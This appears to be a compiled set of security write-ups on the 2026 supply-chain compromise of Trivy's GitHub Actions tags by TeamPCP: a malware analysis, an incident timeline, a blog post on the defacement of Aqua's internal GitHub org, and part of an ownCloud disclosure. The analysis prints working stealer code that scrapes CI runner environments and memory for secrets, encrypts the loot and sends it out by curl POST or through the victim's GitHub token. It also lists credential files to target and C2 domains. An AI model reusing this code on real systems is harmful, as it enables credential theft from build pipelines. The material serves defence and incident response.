    endpoint, with a GitHub-based fallback

Stage
1: Secret Collection#

Process Environment Scraping (Lines 4–29)#

The first block of malicious code
locates GitHub Actions runner processes and harvests their environment
variables:

Bash

_COLLECT_PIDS="$$"

for _name in Runner.Worker Runner.Listener runsvc run.sh; do

  _PIDS=$(pgrep -f
"$_name" 2>/dev/null || true)

  [ -n
"$_PIDS" ] && _COLLECT_PIDS="$_COLLECT_PIDS $_PIDS"

done

 

COLLECTED="/tmp/runner_collected_$$.txt"

: > "$COLLECTED"

 

for _PID in $_COLLECT_PIDS; do

  _ENVIRON="/proc/${_PID}/environ"

  [ -r "$_ENVIRON" ] || continue

  while IFS= read -r line; do

    key="${line%%=*}"

   
val="${line#*=}"

    if echo
"$key" | grep -qiE '(env|ssh)'; then

      printf
'%s=%s\
' "$key" "$val" >> "$COLLECTED"

      if [ -f
"$val" ] && [ ! -S "$val" ]; then

        printf
'\
[%s]\
' "$val" >> "$COLLECTED"

        cat
"$val" >> "$COLLECTED"

        printf '\
'
>> "$COLLECTED"

      fi

    fi

  done < <(tr
'\\0' '\
' < "$_ENVIRON")

done

 

The script finds PIDs for GitHub
Actions runner processes
(Runner.Worker, Runner.Listener, runsvc, run.sh), reads
null-delimited environment variables from /proc//environ, and
filters for keys containing env or ssh. When a matching
variable's value is a file path, it reads and appends the file contents as
well, capturing SSH keys, environment files, and similar material. All
collected data is written to /tmp/runner_collected_.txt.

GitHub-Hosted
Runners: Process Memory Dump
(
Lines 30–32)#

On GitHub-hosted Linux runners, the
malware escalates significantly. A base64-encoded Python script is decoded and
executed with sudo:

Python

import sys, os, re

 

def get_pid():

    for pid in (p for
p in os.listdir('/proc') if p.isdigit()):

        try:

            with
open(os.path.join('/proc', pid, 'cmdline'), 'rb') as f:

                if
b'Runner.Worker' in f.read():

                   
return pid

        except
OSError:

            continue

    raise
SystemExit(0)

 

pid = get_pid()

map_path = f"/proc/{pid}/maps"

mem_path = f"/proc/{pid}/mem"

 

with open(map_path, 'r') as map_f, open(mem_path, 'rb', 0)
as mem_f:

    for line in map_f:

        m =
re.match(r'([0-9A-Fa-f]+)-([0-9A-Fa-f]+) ([-r])', line)

        if not m or
m.group(3) != 'r':

            continue

        start =
int(m.group(1), 16)

        end   = int(m.group(2), 16)

        if start >
sys.maxsize:

            continue

       
mem_f.seek(start)

        try:

            chunk =
mem_f.read(end - start)

           
sys.stdout.buffer.write(chunk)

        except
OSError:

            continue

The script locates
the Runner.Worker process by scanning /proc/*/cmdline,
parses /proc//maps to identify all readable memory
regions, and dumps each region from /proc//mem. The shell
wrapper then greps the raw memory dump for the JSON
pattern "":{"value":"","isSecret":true} —
the internal format GitHub Actions uses to store secrets in the Runner.Worker
.NET process heap.

This technique is made reliable by
the GitHub-hosted runner's privilege model: GitHub documents
passwordless sudo on Linux and macOS hosted runners, which bypasses
ptrace restrictions and Yama LSM settings that would otherwise govern access to /proc//mem.
The shell wrapper then greps for "isSecret":true patterns,
which can likely recover many secrets actually injected into the job and
resident in Runner.Worker memory — especially simple string values. It should
not be assumed to recover every configured secret in the repository,
organization, or environment, since GitHub Actions only injects secrets that
are actually referenced in the workflow, with further caveats for fork-based
PRs, reusable workflows, and Dependabot-triggered runs.

Self-Hosted
Runners: Filesystem Credential Stealer
(Lines 34–36)#

On self-hosted runners or non-Linux
environments, a different base64-encoded Python payload executes, a
comprehensive filesystem credential harvester self-identified as ##
TeamPCP Cloud stealer in a comment on its final line. The script uses
three utility functions (emit for reading files, run for
executing commands, walk for recursive directory traversal) to
systematically search for sensitive data across the runner.

The
targeted credential categories are extensive:

















































































Category



Targets



Reconnaissance



hostname, whoami, uname -a, ip
addr, ip route, printenv



SSH



~/.ssh/id_rsa, id_ed25519, id_ecdsa, id_dsa, authorized_keys, known_hosts, config; /etc/ssh/ssh_host_*_key



Git



~/.git-credentials, ~/.gitconfig



AWS



~/.aws/credentials, ~/.aws/config, AWS_* env
vars, EC2 IMDS at 169.254.169.254, ECS container credentials
at 169.254.170.2



GCP



~/.config/gcloud/*, application_default_credentials.json, GOOGLE_APPLICATION_CREDENTIALS



Azure



~/.azure/*, AZURE_* env vars



Kubernetes



~/.kube/config, /etc/kubernetes/*.conf, service
account tokens, kubectl get secrets --all-namespaces -o json



Docker



~/.docker/config.json, /kaniko/.docker/config.json



Environment files



.env, .env.local, .env.production, .env.development, .env.staging, .env.test —
searched in CWD, parent directories, and recursively
across /opt, /srv, /var/www, /app, /data, /var/lib, /tmp



Database



~/.pgpass, ~/.my.cnf, ~/.mongorc.js, /etc/mysql/my.cnf, /etc/redis/redis.conf,
env vars
matching DATABASE, DB_, MYSQL, POSTGRES, MONGO, REDIS, VAULT



Package managers



~/.npmrc, ~/.vault-token, ~/.netrc



CI/CD configs



terraform.tfvars, terraform.tfstate, .gitlab-ci.yml, .travis.yml, Jenkinsfile, .drone.yml, Anchor.toml, ansible.cfg



TLS private keys



*.key, *.pem, *.p12, *.pfx across all
roots; /etc/ssl/private/, /etc/letsencrypt/



VPN



/etc/wireguard/*.conf, wg showconf all



Webhooks



Greps
for hooks.slack.com and discord.com/api/webhooks



Shell history



~/.bash_history, ~/.zsh_history, ~/.mysql_history, ~/.psql_history, ~/.rediscli_history



System



/etc/passwd, /etc/shadow, auth logs



Crypto wallets



Bitcoin (bitcoin.conf, wallet*.dat), Litecoin,
Dogecoin, Zcash, Dash, Ripple, Monero configs; Ethereum keystores; Cardano
signing and verification keys; Solana keypairs
(validator-keypair.json, vote-account-keypair.json, identity.json)
across ~/.config/solana, /home/sol, /opt/solana; Ledger device
files; Anchor deploy keys;
generic keypair.json/id.json/wallet*.json up to 8 directories deep


 

Stage 2: Encryption (Lines 39–68)#

Before exfiltration, the malware
encrypts all collected data using a standard hybrid encryption scheme:

Bash

openssl rand 32 > "$_SESSION_KEY"
2>/dev/null

openssl enc -aes-256-cbc -in "$COLLECTED" -out
"$_ENC_FILE" \\

  -pass
"file:$_SESSION_KEY" -pbkdf2 2>/dev/null

openssl pkeyutl -encrypt -pubin -inkey "$_PUB_KEY_PEM"
\\

  -in
"$_SESSION_KEY" -out "$_ENC_KEY" \\

  -pkeyopt
rsa_padding_mode:oaep 2>/dev/null

tar -czf "$_BUNDLE" -C "$_WORKDIR"
payload.enc session.key.enc 2>/dev/null

The implementation generates 32
bytes of random session material, which openssl enc uses via PBKDF2
to derive the actual AES-256-CBC key and IV. The session material is then
encrypted with the attacker's embedded RSA-4096 public key using OAEP padding.
Both files, the encrypted payload and the RSA-wrapped session material, are
bundled into tpcp.tar.gz.

Only the holder of the
corresponding RSA private key can unwrap the session material, which is
required to derive the AES key and decrypt the payload. Even if the bundle is
intercepted in transit, its contents remain inaccessible without the private
key.

Stage 3: Exfiltration (Lines
70–104)#

Primary
Channel: HTTPS POST to Typosquat Domain#

Bash

_HTTP=$(curl -s -o /dev/null -w "%{http_code}" -X
POST \\

 
\\

  -H
"Content-Type: application/octet-stream" \\

  -H "X-Filename:
tpcp.tar.gz" \\

  --data-binary
"@${_BUNDLE}" 2>/dev/null || echo "000")

The encrypted bundle is sent
to scan[.]aquasecurtiy[.]org ; note the misspelling of
"security" as "securtiy," a typosquat of the legitimate
Aqua Security domain. The custom header X-Filename:
tpcp.tar.gz identifies the payload type to the receiving server. The HTTP
status code is captured to determine whether the fallback channel is needed.

Fallback Channel: Victim's Own
GitHub Account#

If the primary endpoint returns a
non-2xx response and INPUT_GITHUB_PAT is available, the malware
repurposes that token against the victim. The trivy-action documentation
says github-pat can be either a GitHub Personal Access Token or GITHUB_TOKEN,
but the fallback's use of the /user/repos endpoint, which creates a
repository for the authenticated user, requires a user-scoped token (PAT or
equivalent). The default repository-scoped GITHUB_TOKEN would likely
fail at this step. This means the fallback channel is most dangerous for workflows
that pass a real PAT:

Bash

if [[ ! "$_HTTP" =~ ^2 ]] && [ -n
"${INPUT_GITHUB_PAT:-}" ]; then

 
_REPO="tpcp-docs"

 
_GH_AUTH="Authorization: token ${INPUT_GITHUB_PAT}"

 
_GH_API=""

 

  # Create public
repo on victim's account

  curl -s -X POST
"${_GH_API}/user/repos" \\

    -H
"$_GH_AUTH" \\

    -d
'{"name":"tpcp-docs","private":false,"auto_init":true}'
...

 

  # Create a
release with timestamped tag

 
_TAG="data-$(date +%Y%m%d%H%M%S)"

  _RELEASE_ID=$(curl
-s -X POST "${_GH_API}/repos/${_GH_USER}/tpcp-docs/releases" ...)

 

  # Upload
encrypted bundle as release asset

  curl -s -X POST \\

   
""
\\

    --data-binary
"@${_BUNDLE}" ...

fi

This fallback creates a public repository
named tpcp-docs on the victim's own GitHub account, creates a release
with a timestamped tag, and uploads the encrypted bundle as a release asset.
The attacker can then search GitHub for tpcp-docs repositories to
locate and download stolen data.

The design is notable for its
resilience: the data is stored on GitHub's own infrastructure, which is
unlikely to be blocked by corporate firewalls or network policies. The
innocuous repository name avoids immediate suspicion, and the attacker requires
no additional infrastructure to retrieve exfiltrated material.

Cleanup (Lines
103–105)#

Bash

rm -rf "$_WORKDIR" "$_PUB_KEY_PEM"

fi

rm -f "$COLLECTED"

All temporary files are removed.
The only persistent traces are the tpcp-docs repository (if the
fallback was triggered) and network logs showing the outbound HTTPS POST.

Attribution#

The malware self-identifies
as TeamPCP Cloud stealer in a Python comment on the final line of the
embedded filesystem credential harvester. TeamPCP, also tracked as DeadCatx3,
PCPcat, and ShellForce, is a documented cloud-native threat actor known for
exploiting misconfigured Docker APIs, Kubernetes clusters, Ray dashboards, and
Redis servers. The group has been linked to worm-driven ransomware, data
exfiltration, and cryptomining campaigns, and was profiled
by Flare
and reported
on by The Hacker News
in February 2026.

The credential targets in this
payload are consistent with the group's broader cloud-native
theft-and-monetization profile. The heavy emphasis on Solana validator keypairs
and cryptocurrency wallets is less well-documented as a TeamPCP hallmark,
though it aligns with the group's known financial motivations. The
self-labeling could be a false flag, but the technical overlap with prior
TeamPCP tooling makes genuine attribution plausible.

Remediation#

Organizations should stop
using trivy-action by version tag immediately
. The only safe options are
pinning to commit SHA 57a97c7e7821a5776cebc9bb87c984fa69cba8f1 or
using tag 0.35.0 exclusively.

Any pipeline that executed a
poisoned tag should be treated as fully compromised. All secrets accessible to
that workflow including cloud credentials, SSH keys, API tokens, database
passwords, Docker registry tokens should be rotated immediately.

Security teams should audit their
GitHub organization for tpcp-docs repositories and review GitHub
Actions logs for any trivy-action runs occurring after approximately
19:00 UTC on March 19, 2026.

Indicators of Compromise (IOCs)#

Network
Indicators
#


  • scan[.]aquasecurtiy[.]org

File
Hashes#


  • 18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a
    (SHA256, entrypoint.sh)

Compromised
Actions#


  1. aquasecurity/[email protected] (f7773844)

  2. aquasecurity/[email protected] (f5c9fd92)

  3. aquasecurity/[email protected] (22e864e7)

  4. aquasecurity/[email protected] (6ec7aaf3)

  5. aquasecurity/[email protected] (555e7ad4)

  6. aquasecurity/[email protected] (794b6d99)

  7. aquasecurity/[email protected] (506d7ff0)

  8. aquasecurity/[email protected] (91d5e0a1)

  9. aquasecurity/[email protected] (252554b0)

  10. aquasecurity/[email protected] (b9faa60f)

  11. aquasecurity/[email protected] (3c615ac0)

  12. aquasecurity/[email protected] (c19401b2)

  13. aquasecurity/[email protected] (4209dcad)

  14. aquasecurity/[email protected] (61fbe20b)

  15. aquasecurity/[email protected] (0d49ceb3)

  16. aquasecurity/[email protected] (2e7964d5)

  17. aquasecurity/[email protected] (1d74e4cf)

  18. aquasecurity/[email protected] (3201dddd)

  19. aquasecurity/[email protected] (ea56cd31)

  20. aquasecurity/[email protected] (9738180d)

  21. aquasecurity/[email protected] (ef3a510e)

  22. aquasecurity/[email protected] (bb75a905)

  23. aquasecurity/[email protected] (9e8968cb)

  24. aquasecurity/[email protected] (7f6f0ce5)

  25. aquasecurity/[email protected] (0891663b)

  26. aquasecurity/[email protected] (3dffed04)

  27. aquasecurity/[email protected] (cf1692a1)

  28. aquasecurity/[email protected] (848d665e)

  29. aquasecurity/[email protected] (fa4209b6)

  30. aquasecurity/[email protected] (8cfb9c31)

  31. aquasecurity/[email protected] (18f01feb)

  32. aquasecurity/[email protected] (7b955a5e)

  33. aquasecurity/[email protected] (d488f438)

  34. aquasecurity/[email protected] (fa78e67c)

  35. aquasecurity/[email protected] (a5b4818d)

  36. aquasecurity/[email protected] (6fc874a1)

  37. aquasecurity/[email protected] (2a51c5c5)

  38. aquasecurity/[email protected] (ddb66974)

  39. aquasecurity/[email protected] (aa3c46a9)

  40. aquasecurity/[email protected] (4bdcc5d9)

  41. aquasecurity/[email protected] (b745a35b)

  42. aquasecurity/[email protected] (da73ae07)

  43. aquasecurity/[email protected] (7550f14b)

  44. aquasecurity/[email protected] (8aa8af3e)

  45. aquasecurity/[email protected] (e53b0483)

  46. aquasecurity/[email protected] (276ca968)

  47. aquasecurity/[email protected] (8ae5a08a)

  48. aquasecurity/[email protected] (820428af)

  49. aquasecurity/[email protected] (cf19d27c)

  50. aquasecurity/[email protected] (405e91f3)

  51. aquasecurity/[email protected] (2297a1b9)

  52. aquasecurity/[email protected] (2b1dac84)

  53. aquasecurity/[email protected] (f4f1785b)

  54. aquasecurity/[email protected] (3d1b5be1)

  55. aquasecurity/[email protected] (985447b0)

  56. aquasecurity/[email protected] (85cb72f1)

  57. aquasecurity/[email protected] (38623bf2)

  58. aquasecurity/[email protected] (9092287c)

  59. aquasecurity/[email protected] (b7befdc1)

  60. aquasecurity/[email protected] (9ba3c3cd)

  61. aquasecurity/[email protected] (fd090040)

  62. aquasecurity/[email protected] (e0198fd2)

  63. aquasecurity/[email protected] (ddb94181)

  64. aquasecurity/[email protected] (b7252377)

  65. aquasecurity/[email protected] (66c90331)

  66. aquasecurity/[email protected] (c5967f85)

  67. aquasecurity/[email protected] (9c000ba9)

  68. aquasecurity/[email protected] (ad623e14)

  69. aquasecurity/[email protected] (85190378)

  70. aquasecurity/[email protected] (fd429cf8)

  71. aquasecurity/[email protected] (19851bef)

  72. aquasecurity/[email protected] (91e7c2c3)

  73. aquasecurity/[email protected] (ab6606b7)

  74. aquasecurity/[email protected] (a9bc513e)

  75. aquasecurity/[email protected] (ddb9da44)

 

Phase 04
Obfuscation

(1 event)

Thu, Mar 19- 00:08:33 - 00:09:00 UTC

Discussion #10420 Flooded

~100 accounts posted generic praise
comments within ~30 seconds, drowning technical discussion and incident
coordination. Includes troll comments referencing "sugma" and
"ligma".

               Phase
06  ICP Fallback Activated

(6 events)

Sun, Mar
22
~11:45 UTC

kamikaze.sh v1 Payload Active on ICP C2 @CharlieEriksen

 

~12:45 UTC

kamikaze.sh v2: Modular Architecture

ICP canister now redirects to
Cloudflare tunnel. Payload evolved from monolithic bash to 15-line loader that
fetches kube.py from C2 at runtime, then self-deletes.

~13:00 UTC

kamikaze.sh v3: Now a Worm

Major pivot: no longer K8s-focused.
Now a self-propagating worm targeting SSH keys and exposed Docker APIs (port
2375). Scans local /24 subnet, parses auth logs for targets.

~13:25 UTC

kamikaze.sh v3.1: Two-Module Architecture

Payload split into separate
modules: kube.py (K8s DaemonSets) + prop.py (worm
spreading). K8s module appears degraded (placeholder base64), but worm module
fully functional.

14:56 UTC

kamikaze.sh v3.2: Production-Ready Deployment

C2 infrastructure rotated. The
placeholder PYTHON_B64 from v3.1 now contains actual ICP backdoor
payload—v3.1 appears to have been a dev/test build.

~16:15 UTC

kamikaze.sh v3.3: WAV Steganography

Payloads now hidden in WAV audio
files. Python modules embedded as base64 in audio frames, extracted at runtime.
Evades .py filters and static analysis.

                             

Phase 07 Docker Hub Direct Push

                                             (4 events, 3 milestones)

Sun, Mar 22- 15:43 UTC

aquasec/trivy:0.69.5 pushed to Docker Hub

               Attacker
pushes malicious image directly to Docker Hub, bypassing the GitHub release
process entirely. No corresponding v0.69.5 tag exists on GitHub—this is a
direct registry attack using compromised credentials. Image propagates to
third-party mirrors including mirror.gcr.io.

Docker Hub (link 
broken)

16:34 UTC

aquasec/trivy:0.69.6 pushed to Docker Hub

               Second
malicious image pushed less than an hour after 0.69.5. Attacker continues to
exploit Docker Hub access while GitHub-side compromise is being remediated.
Spotted by @rut64449 in GitHub discussion.

Docker Hub (link broken)

Mar 22, 20:31–20:32 UTC

Using
compromised Argon-DevOps-Mgt service account, attacker defaced 44
repositories in aquasec-com—Aqua's internal GitHub org—in a 2-minute
automated blitz. All repos renamed with tpcp-docs- prefix; internal
assets now publicly exposed.

Internal Aqua Repos Publicized via aquasec-com Org

OpenSourceMalware

(https://opensourcemalware.com/blog/teampcp-defaces-aqua-securitys-internal-github-org-44-repos-exposed)

               MAR
23, 2026

TeamPCP
Defaces Aqua Security’s Internal GitHub Org

TeamPCP compromised the aquasec-com
GitHub organization, renaming all 44 repositories and exposing internal source
code, CI/CD configs, and knowledge bases.

The OpenSourceMalware team has identified an active compromise
of the aquasec-com GitHub organization — Aqua Security's internal org
for proprietary code. The threat actor TeamPCP (aka DeadCatx3,
PCPcat, ShellForce) defaced all 44 repositories in a scripted 2-minute burst,
renaming every repo with a tpcp-docs- prefix and setting all
descriptions to "TeamPCP Owns Aqua Security." Our forensic analysis
of the GitHub Events API points to a compromised service account token — likely
stolen during TeamPCP's prior Trivy GitHub Actions compromise — as the attack
vector.

This is not the first time TeamPCP
has targeted Aqua Security. It's the latest escalation from a threat actor that
has been building capability across the cloud-native ecosystem for months.

TL;DR


  • Threat
    Actor
    :
    TeamPCP (aka DeadCatx3, PCPcat, ShellForce,
    CanisterWorm)

  • Target: aquasec-com GitHub
    organization (Aqua Security's internal/private org)

  • Impact: 44
    internal repos defaced, renamed, and exposed publicly — including source
    code for Tracee, internal Trivy forks, CI/CD pipelines, Kubernetes
    operators, and team knowledge bases

  • Attack
    Vector
    :
    Compromised Argon-DevOps-Mgt service
    account token (high confidence)

  • Key
    Finding
    :
    The threat actor tested the stolen token 7 hours
    before the defacement by creating and deleting a ghost branch
    on aquasecurity/trivy-plugin-aqua — the public Aqua Security org
    is also at risk

Discovery

On March 22, 2026, we observed all
44 repositories in the aquasec-com GitHub organization had been
simultaneously renamed and defaced. The org profile
at github.com/orgs/aquasec-com showed every repo prefixed
with tpcp-docs- and carrying the description "TeamPCP Owns Aqua
Security."

The aquasec-com org
(GitHub ID 203123164, created 2025-03-13) is distinct from Aqua Security's
well-known open-source org aquasecurity (ID 12783832, created
2015-06-07, 219 public repos). The compromised org appears to be their internal
org for proprietary code — making this exposure particularly damaging.

The
Defacement: A 2-Minute Automated Blitz

Using the GitHub Events API and
repo metadata, we reconstructed the exact timeline. All 44 repos were modified
between 20:31:07 UTC and 20:32:26 UTC — a
~2-minute window that confirms
automated scripting via the GitHub API
:

































































Time
(UTC)



Renamed
Repo



Original
Name



20:31:07



tpcp-docs-aqua-deployer



aqua-deployer



20:31:15



tpcp-docs-tracee



tracee



20:31:17



tpcp-docs-aqua-trivy



aqua-trivy



20:31:24



tpcp-docs-supply-chain-lambdas



supply-chain-lambdas



20:31:53



tpcp-docs-cicd



cicd



20:32:05



tpcp-docs-tracee-detectors



tracee-detectors



20:32:14



tpcp-docs-aquai



aquai



20:32:20



tpcp-docs-kb-personal-yaniv



kb-personal-yaniv



20:32:24



tpcp-docs-kube-hunter



kube-hunter



...



(44 repos total)



...



 



 



 


Every
repo received the description: "TeamPCP Owns Aqua Security."

The attack was trivially a loop
of PATCH /repos/{org}/{repo} calls with the new name and description.
GitHub's public events API does not log repo rename or description change
operations, making the defacement invisible in events — only the updated_at timestamps
on each repo betray the exact timing.

Ground
Zero: The Argon-DevOps-Mgt Service Account

Our forensic analysis
identified Argon-DevOps-Mgt as the high-confidence compromised
account. This is a service/bot account (GitHub ID 139343333, created
2023-07-12) with a critical property: it bridges both GitHub orgs.

Argon-DevOps-Mgt Account

Cross-Org
Admin Access


  • `aquasec-com`
    org
    : 43 PublicEvent operations over 1.5 years (making
    repos public requires admin access)

  • `aquasecurity`
    org
    : Creating releases (v0.217.1, v0.218.0, v0.218.1) and
    triggering workflows on trivy-plugin-aqua

One compromised token for this
account gives the attacker write/admin access to both organizations.

The
Ghost Branch: Token Testing at 13:24 UTC

Seven hours before the defacement,
at 13:24:25 UTC, the Argon-DevOps-Mgt account created a
branch
named update-plugin-links-v0.218.2 on aquasecurity/trivy-plugin-aqua and deleted
it at the exact same second
(GitHub event IDs 9676884051 and
9676884079).

This
is anomalous for three reasons:


  1. No
    v0.218.2 release or tag exists
    — only v0.218.0 and v0.218.1

  2. No
    workflow run was triggered
    — the established pattern for this
    account (confirmed across v0.217.1, v0.218.0, v0.218.1) is that branch
    creation triggers a create pr workflow. No such run exists for
    v0.218.2

  3. The
    branch name follows the account's naming convention

    the threat actor mimicked the
    expected update-plugin-links-vX.Y.Z pattern, suggesting they
    studied the account's behavior before acting

This is consistent with a threat
actor testing a stolen token's capabilities — creating a
branch to confirm write access, then immediately deleting it to minimize
detection, before proceeding with the main attack 7 hours later.

Why
This Account?


  • Zero
    followers, zero public repos, no bio, no social links — a pure service
    account

  • Uses pusher_type:
    "user" (not a GitHub App), indicating a PAT-based
    authentication

  • Service
    accounts typically use long-lived Personal Access Tokens without
    MFA

  • The
    account triggers CI workflows on trivy-plugin-aqua — its token
    was present in CI runner environments

The
Kill Chain: From Trivy Compromise to Org Defacement

TeamPCP has been systematically targeting the Aqua Security
ecosystem. The credential theft chain is:

Stage
1: Trivy GitHub Actions Tag Poisoning
(documented by
Socket.dev)


  • TeamPCP
    compromised Trivy GitHub Actions tags, injecting a credential harvester

  • The
    harvester (self-identified as "TeamPCP Cloud stealer" in its
    source) systematically scraped CI runners for GitHub tokens, SSH keys,
    cloud credentials, and environment variables

Stage
2: Token Harvesting


  • The Argon-DevOps-Mgt service
    account's PAT was likely captured from a CI runner during Stage 1

  • As a
    service account that triggers workflows on trivy-plugin-aqua, its
    token was present in the runner environment

Stage
3: Reconnaissance
(March 22, 13:24 UTC)


  • Threat
    actor tested the token by creating and deleting a branch
    on aquasecurity/trivy-plugin-aqua

  • Confirmed
    write access to the aquasecurity org

Stage
4: Enumeration and Scripting
(~13:25–20:30 UTC)


  • Threat
    actor enumerated repos in the aquasec-com org via the API

  • Prepared
    a defacement script to rename all repos and change descriptions

Stage
5: Defacement
(March 22, 20:31 UTC)


  • Executed
    automated API calls to rename all 44 repos
    with tpcp-docs- prefix

  • Set
    all descriptions to "TeamPCP Owns Aqua Security."

  • Completed
    in under 2 minutes

What
Was Exposed

The 44 internal repos span Aqua Security's entire
engineering organization:

Core
Security Products
:


  • tracee —
    Runtime security engine (private fork with internal features)

  • tracee-detectors —
    Detection rules and test automation

  • aqua-trivy —
    Internal Trivy customization

  • kube-hunter —
    Kubernetes penetration testing tool

  • aquai —
    AI product (with GitHub Pages deployment)

Infrastructure
& CI/CD:


  • cicd —
    CI/CD pipeline configurations

  • infra-provisioner —
    Infrastructure provisioning (Terraform, GKE)

  • supply-chain-lambdas —
    AWS Lambda functions

  • arc / arc-aquasec-com —
    Actions Runner Controller configs

  • rhel-eks-ami —
    Custom AMI builds

Internal
Tooling:


  • aqua-react —
    Frontend UI application

  • go-utils / cnapp-go-utils —
    Shared Go libraries with proto definitions

  • .github-private —
    Shared GitHub Actions workflows with ECR login, deployment configs

Knowledge
Bases:


  • kb-shared, kb-team-tracee, kb-group-runtime, kb-personal-yaniv, kb-projects

Any
secrets, API keys, or credentials in these repos or their CI/CD configurations
should be
considered
compromised.

Who
is TeamPCP?

TeamPCP is a cloud-native threat
actor that has been escalating in capability throughout 2025-2026:





























Attribute



Detail



Aliases



DeadCatx3, PCPcat, ShellForce, CanisterWorm



Tracked By



Flare, Aikido Security, Socket.dev, The Hacker News,
Maltrail



Known TTPs



Docker API exploitation, Kubernetes cluster compromise,
supply chain poisoning, worm deployment, ransomware, cryptomining, Kubernetes
wipers



Notable CVEs



CVE-2025-29927, CVE-2025-55182 (React2Shell)



C2 Infrastructure



ICP Canisters (first observed), Cloudflare Tunnels


Their
progression shows increasing sophistication:


  1. Cloud
    exploitation
    — Misconfigured Docker APIs, Kubernetes, Redis,
    Ray dashboards

  2. Supply
    chain attacks
    — Trivy GitHub Actions tag compromise, NPM
    package compromise

  3. CanisterWorm
    Self-propagating worm using ICP Canister for C2 (first-of-its-kind)

  4. Kubernetes
    wipers
    — Destructive payloads targeting Iran (reported by
    Aikido, March 22, 2026)

  5. Org-level
    compromise
    — This attack against aquasec-com

Indicators
of Compromise (IOCs)

Domains

aquasecurtiy.org

scan.aquasecurtiy.org

C2 Infrastructure

tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io

championships-peoples-point-cassette.trycloudflare.com

investigation-launches-hearings-copying.trycloudflare.com

souls-entire-defined-routes.trycloudflare.com

GitHub Artifacts

Organization: github.com/aquasec-com (compromised)

Defacement pattern: "tpcp-docs-" prefix on all
repo names

Defacement message: "TeamPCP Owns Aqua Security."

Compromised account: Argon-DevOps-Mgt (GitHub ID 139343333)

Defacement timestamp: 2026-03-22T20:31:07Z to
2026-03-22T20:32:26Z

Token test timestamp: 2026-03-22T13:24:25Z (ghost branch on
trivy-plugin-aqua)

File System Indicators

/tmp/pglog (CanisterWorm payload drop path)

VirusTotal

18a24f83e807479438dcab7a1804c51a00dafc1d526698a66e0640d1e5dd671a

Recommendations

For Aqua Security:


  1. Immediately
    revoke all tokens/PATs for Argon-DevOps-Mgt and all service
    accounts

  2. Review
    the aquasec-com org audit log to confirm the compromised account
    and attacker IP

  3. Audit
    the aquasecurity public org — the same token has confirmed write
    access

  4. Rotate
    all secrets referenced in exposed repos (AWS keys, API tokens,
    LaunchDarkly keys, Jenkins credentials)

  5. Scan
    CI/CD runners for TeamPCP indicators (/tmp/pglog, ICP canister
    connections)

For the Community:


  1. If
    you depend on aquasecurity/trivy-plugin-aqua, verify recent releases
    were not tampered with

  2. Pin
    GitHub Actions to full commit SHAs, not tags

  3. Audit
    service account tokens — enforce short-lived tokens and least-privilege
    scoping

  4. Monitor
    for the IOCs listed above in your CI/CD environments

References

Conclusion

This compromise demonstrates the
long tail of supply chain attacks. A credential harvested during the Trivy
GitHub Actions compromise months ago was weaponized today to deface an entire
internal GitHub organization. The Argon-DevOps-Mgt service account —
a single bot account bridging two orgs with a long-lived PAT — was the weak
link.

TeamPCP continues to escalate. From
cloud exploitation to supply chain worms to Kubernetes wipers, they are
building capability and targeting the security vendor ecosystem itself. The
irony of a cloud security company being compromised by a cloud-native threat
actor should not be lost on the industry.

If you encounter similar defacement
patterns, compromised tokens, or TeamPCP indicators, please report them
to OpenSourceMalware.com.

Stay safe out there.






Tags: #supply-chain #github #TeamPCP #aquasecurity #c2
#worm #ioc

 

23:20 UTC

            aquasec-com Repositories
CleanedInternal org repos restored and defacement removed

Sun, Mar 22- 01:40 UTC

Malicious Docker Tags Removed. All
15 tags removed from Docker Hub (0.69.5, 0.69.6, latest + arch variants) — ~9.5
hour exposure window.

Mon, Mar
23-
06:25 UTC

mirror.gcr.io Images Removed. Google removes cached malicious
images from mirror.gcr.io after Aqua outreach. Confirmation.

Fri, Mar 27- 12:00 UTC

ownCloud discloses build infrastructure compromise

ownCloud confirms Trivy supply
chain attack (CVE-2026-33634) exposed build credentials. Container images and
nightly builds since March 19 removed; security patch releases delayed
weeks while systems are rebuilt.

Disclosure

(https://central.owncloud.org/t/security-notice-impact-of-cve-2026-33634-on-owncloud-build-infrastructure/65655)

Security
Notice: Impact of CVE-2026-33634 on ownCloud Build Infrastructure

post by jordana on Mar 27

jordana -
Mar 27

Summary

On March 19, 2026, a critical
supply chain attack compromised Aqua Security’s Trivy vulnerability scanner
(CVE-2026-33634, CVSS 9.4). This attack affected organizations worldwide that
use Trivy in their CI/CD pipelines. ownCloud was among those affected.

The key facts: No customer data was
compromised. No source code was altered. The attack affected our build
infrastructure only – specifically the systems that produce container images
and client binaries. We have contained the incident, but our ability to ship
new builds and patches is temporarily suspended.

What Happened

Trivy is a widely-used open source
security scanner maintained by Aqua Security. It’s an industry-standard tool
used by thousands of projects and companies to scan container images and code
for vulnerabilities. On March 19, attackers used previously compromised
credentials to inject malicious code into official Trivy releases (v0.69.4 and
later), turning a trusted security tool into a vehicle for credential theft.

This is not an ownCloud only
vulnerability
. Every open source project that uses Trivy in conjunction
with an latest open source CI/CD pipeline is potentially affected by this
attack. ownCloud happens to be one of them.

Impact on ownCloud

The compromised Trivy version ran
in our build environment, which means access credentials for our build and
release infrastructure were likely exposed to the attackers. Here’s what that
means in practice:

·       
Source code: Not touched. Not altered.
Our code repositories remain intact.

·       
Build artifacts: Container images and
nightly client builds created after March 19 are considered potentially
compromised. We have removed all of them from public distribution channels
(Docker Hub, quay.io, GitHub, NPMjs).

·       
Stable releases: Previously published
stable releases that pre-date March 19 are unaffected.

·       
Customer data: No customer-facing systems
or customer data were exposed or affected at any point.

·       
Mobile apps: No new versions were
published to iOS or Android app stores since the breach.

Action Required:
ocis-rolling Image Users

If you are using the ocis-rolling
container image, please contact us immediately at [email protected] The rolling
image may have been built during the exposure window and should not be used
until further notice. Replace it with a known-good tagged release that
pre-dates March 19, 2026.

Current Status and What Comes
Next

We’ve taken aggressive containment measures:

• All affected build systems have
been shut down or isolated.

• All known-exposed credentials and
tokens have been revoked.

• All potentially compromised
artifacts have been removed from public repositories.

• Kiteworks has mobilized resources
from across the entire group to fast-track the resolution.

What this means for releases:
We currently cannot produce any new patches, builds, or releases for any
ownCloud product. This includes oCIS, oC10, the desktop client, iOS and Android
and their related components. We don’t yet know how long restoration will take.
Realistically, we are looking at a delay of several weeks before build
infrastructure is fully restored and verified. We understand this impacts
promised delivery timelines and we will communicate updated schedules as soon
as we have clarity.

We are running a full forensic
analysis of all affected systems and simultaneously evaluating alternative
build pipelines to restore release capability as quickly as possible.

A Note on Transparency

We believe the open source
